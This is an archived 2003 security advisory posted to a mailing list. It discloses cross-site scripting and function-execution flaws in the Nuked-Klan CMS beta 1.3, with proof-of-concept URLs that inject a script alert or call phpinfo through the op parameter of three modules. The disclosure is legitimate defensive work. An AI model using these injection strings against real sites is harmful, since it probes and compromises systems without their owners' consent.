[SCSA-006] XSS & Function Execution Vulnerabilities in Nuked-Klan

From: Grégory (gregory.lebras@security-corp.org)
Date: Fri Feb 21 2003 - 17:44:50 PST

Next message: eflorioat_private: "Weak Encryption Scheme in Telindus 112x"

Previous message: Grégory: "[SCSA-007] Cross Site Scripting Vulnerabilities in WWWBoard"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) ________________________________________________________________________ Security Corporation Security Advisory [SCSA-006] ________________________________________________________________________ PROGRAM: Nuked-Klan HOMEPAGE: http://www.nuked-klan.org VULNERABLE VERSIONS: beta 1.3 ________________________________________________________________________ DESCRIPTION ________________________________________________________________________ Nuked Klan is a PHP Gateway for "clans". (direct quote from Nuked Klan website) DETAILS & EXPLOITS ________________________________________________________________________ Many Cross-Site Scripting vulnerabilities have been found in Nuked Klan which allow attackers to inject script codes into the page and use them on clients browser as if they were provided by the site. These Cross-Site Scripting vulnerabilities are found in the following modules : Team, News, Links(Liens). An attacker can input specially crafted links and/or other malicious scripts. Moreover this vulnerability allows an attacker to reach certain functions of php. Team ________________________________________________________________________ A vulnerability was discovered at this adress : XSS: ---- http://[target]/index.php?file=Team&op=<script>alert('Test');</script> Function Execution: ------------------- http://[target]/index.php?file=Team&op=phpinfo (display phpinfo(); - Outputs lots of PHP information) News ________________________________________________________________________ A vulnerability was discovered at this adress : XSS: ---- http://[target]/index.php?file=News&op=<script>alert('test');</script> Function Execution: ------------------- http://[target]/index.php?file=News&op=phpinfo (display phpinfo(); - Outputs lots of PHP information) Links ________________________________________________________________________ A vulnerability was discovered at this adress : XSS: ---- http://[target]/index.php?file=Liens&op=<script>alert('test');</script> Function Execution: ------------------- http://[target]/index.php?file=Liens&op=phpinfo (display phpinfo(); - Outputs lots of PHP information) SOLUTIONS ________________________________________________________________________ No solutions for the moment. VENDOR STATUS ________________________________________________________________________ The vendor has reportedly been notified. It currently develops a patch. LINKS ________________________________________________________________________ http://www.security-corp.org/index.php?ink=4-15-1 Version Française : http://www.security-corp.org/advisories/SCSA-006-FR.txt ------------------------------------------------------------ Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org ------------------------------------------------------------

Next message: eflorioat_private: "Weak Encryption Scheme in Telindus 112x"
Previous message: Grégory: "[SCSA-007] Cross Site Scripting Vulnerabilities in WWWBoard"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Feb 23 2003 - 09:46:14 PST